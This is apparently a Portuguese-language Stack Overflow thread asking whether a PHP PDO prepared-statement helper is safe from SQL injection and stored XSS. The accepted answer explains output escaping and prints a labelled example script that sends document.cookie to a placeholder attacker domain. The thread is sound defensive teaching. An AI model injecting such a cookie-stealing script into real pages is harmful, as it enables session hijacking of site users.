# PHP Segurança Stored XSS e SQL Injection

Tags: php, sql-injection, xss

Existe alguma falha de segurança ou possibilidade de ataques no trexo de código a baixo?

```
public static function prepareQuery($query, $params){

        $preparedQuery = self::getConn()->prepare($query);
        foreach ($params as $key => $value) {
            $preparedQuery->bindValue($key, $value);
        }

        $preparedQuery->execute();
        $result = $preparedQuery->fetchAll(PDO::FETCH_OBJ);

        return $result;
    }
```

**Em especial para:**

> $result = $preparedQuery->fetchAll(PDO::FETCH_OBJ);

**A entrada de tados que eu recebo em:**

> fetchAll(PDO::FETCH_OBJ)

é segura? Existe algum tipo de validação que eu possa fazer para evitar algum possível ataque ou código mal intencionado?

Comment: Olá Alan, andei observando que marcou uma das respostas como corretas nesta sua pergunta https://pt.stackoverflow.com/q/197797/3635, mas preciso lhe dizer ambas respostas estão totalmente erradas, a primeira que você marcou é uma gambiarra bem desnecessária e a outra responde sobre algo que não tem haver com SQL-injection. Recomendo que leia isto: https://pt.stackoverflow.com/a/188306/3635. Até mais.

Comment: @GuilhermeNascimento naquela pergunta o meu problema é com o seguinte trecho de código: "foreach ($_POST as $key => $value) $$key = $value;" Esse pedaço de código é apontado como "Code Injection" os valores das váriaveis recebidas são passadas para esse meu método aqui a cima q trata com prepare. Porém segundo o que eu conseguir entender é que eu tenho que tratar toda a entrada de dados. Eu não sei ainda qual é a melhor forma de fazer. Por isso, achei que aquela estava correta!

Comment: o `$_POST` dentro de foreach ou não é a mesma situação de https://pt.stackoverflow.com/a/188306/3635, você pode até usar o foreach, mas prefira usa-lo junto com bindParam, a tua pergunta esta boa, o problema lá são as respostas do Carlos e do Gustavo que ensinam errado.

Comment: O meu problema é q eu tenho um documento de analise de segura do sistema feito pela "https://www.t-systems-mms.com/" onde são apontadas várias falhas de seguranças com o tipo de falha e o nível. Também é mostrado as linhas q contem falhas e é destacado em vermelho o trecho que possui falha. no trecho: "foreach ($_POST as $key => $value) $$key = $value;" eu tenho as váriavés $_POST e $value marcados de vermelho e o trecho completo marcado como "Code Injection". Eu não tenho certeza mas acredito que essa criação automatica de variaveis possa gerar a execução de código externo.

Comment: Acontece que nesse seu código, você não está validando *absolutamente nada* está simplesmente construindo a *query*. Além do mais, o *bindValue* é algo bem direito.

Comment: Mas o método "->prepare($query)" não deveria válidar a minha query?

Comment: @alan como eu disse, se tratando de XSS você pode tratar na hora de exibir, não vejo necessidade de tratar na hora de salvar, mas se ainda sim desejar faça isto: `foreach ($params as $key => $value) {
            $preparedQuery->bindValue($key, strip_tags($value));
        }`

Answer (score 3, accepted):

XSS é uma coisa e SQL-Injection é outra totalmente diferente, apesar de ambas poderem (sempre) se originarem da mesma fonte:

### SQL-injection

Ocorre se o usuário puder manipular ou quebrar a query. Quando usamos `bindValue` e `bindParam`, as próprias APIs nativas já *"tratam"* isso. Recomendo que leia esta outra resposta minha:

- [Por que dizem que o $_GET no PHP é inseguro contra sql injection?](https://pt.stackoverflow.com/a/188306/3635)

### XSS

É a injeção de código que será posteriormente exibidos na página. Isso pode ocorrer com `bindParam` pois não é um problema de SQL. Qualquer meio de armazenamento que mostre os dados na página posteriormente pode sofrer desta falha, por exemplo: ao invés de salvar os dados em um banco, o site salva em um .txt:

salvar.php

```
file_put_contents('mural.txt', $_POST['mensagem'], FILE_APPEND);
```

E na hora de exibir o mural.txt fizesse apenas isto:

exibir.php

```
echo file_get_contents('mural.txt');
```

Qualquer coisa que foi enviada no `$_POST['mensagem']`, será exibida diretamente, até mesmo HTML, JS e CSS que foram criados por quem enviou. Nisso, pode ocorrer a exploração dos dados, como ler e sequestrar os cookies se o JS enviado fizer algo como:

```
<script>
var q = document.createElement('script');
q.src = "http://www.sitequevaisequestraroscookies.com/pagina?cookies=" + encodeURI(document.cookie);
document.body.appendChild(q);
</script>
```

É um código de exemplo só para entender como ocorre.

### Conclusão

Creio que `bindParam` e `bindValue` já resolve o SQL-injection, mas o XSS você pode resolver de outra maneira. As pessoas falam para fazer coisas como:

```
 $preparedQuery->bindValue($key, htmlentities($_POST['mensagem']));
```

Ou:

```
 $preparedQuery->bindValue($key, strip_tags($_POST['mensagem']));
```

Sim, são coisas que funcionam, mas existe um problema, não de segurança, mas de quebra nos dados. Eu pessoalmente sou a favor de salvar os dados da maneira que vieram, somente tratando para evitar SQL-injection, e o XSS deveria ser resolvido na hora de exibir os dados e não na hora de gravar. Isso porque é muito comum de ocorrer perda de caractéres e coisas do gênero, o que pode fazer os dados do banco ficarem "quebrados" e impossível de recuperar.

Não vou entrar em detalhes, não é bem culpa do `strip_tags` ou `htmlentities`. O que ocorre é que muitas vezes as pessoas migram os dados ou mudam as páginas/sistemas e etc e nestas manutenções as coisas podem se perder. Fora que se os dados forem reaproveitados em um sistema **"não web"** pode ocorrer de ficar assim na *GUI*:

```
&lt;p&gt;olá&lt;/p&gt;
```

Imagine que o seu sistema tem tutoriais sobre HTML ou outras linguagens. Poderá perder a formatação. Muitos sistemas de fóruns como IP.Board (o qual usei uma época) perdeu muitos dados conforme os upgrades para novas versões.

Ou seja grave da maneira que veio e faça o tratamento na hora de exibir:

```
while ($row = $q->fetch(PDO::FETCH_ASSOC)) {
    echo 'Nome: ', htmlentities($row['nome']), '<br>',
         'mensagem: ', htmlentities($row['mensagem']), '<hr>';
}
```

Claro que se quiser usar `strip_tags` e for seu objetivo de fato não falar de códigos em nenhum local do site, pode se usar no momento da gravação. Mas pense assim: se for um sistema de chamados do qual você precisa passar para outro analista um código que tenha trechos HTML ou algo assim, ao limpar a string a mensagem perderá o sentido, então trocar os caracteres HTML por entidades seria mais adequado a situação.

Comment: Obrigado pelos esclarecimentos @Guilherme Nascimento! Eu nunca havia me preocupado antes com algum possível ataque vindo diretamente do banco de dados! :)

Comment: Acho que poderia adicionar mais exemplos no XSS, se não posso postar depois, estou em viajem, fica difícil. :(. Mas,  por exemplo, se a pessoa utilizar o `PHP_SELF` (e similares) no form, não tratar upload de imagens (em principal)  e arquivos. Um outro caso é fazer um `echo` comum de uma variável, do banco de dados ou do `GET/POST`. E o XSS tem muito mais forma de "resolver" (na verdade reduzir os danos), como por exemplo adicionar o header de `Content-Security-Policy`.

Comment: @Inkeliz deve ter alguma pergunta especifica sobre o assunto, [*sim estou ciente sobre o Content-Security-Policy*](https://pt.stackoverflow.com/a/75492/3635), a ideia aqui era explicar que talvez tratar antes (exceto o sql-injection) pode não ser uma boa, devido a possibilidade de "truncar" os dados, não sei se já viu aqueles blogs wordpress mais antigos, que falam de programação, muitos deles após o update do wordpress truncaram os tutoriais fazendo muita coisa se perder, isto também ocorreu com sistemas de fórum como [IP.Board](https://invisionpower.com/features/apps/)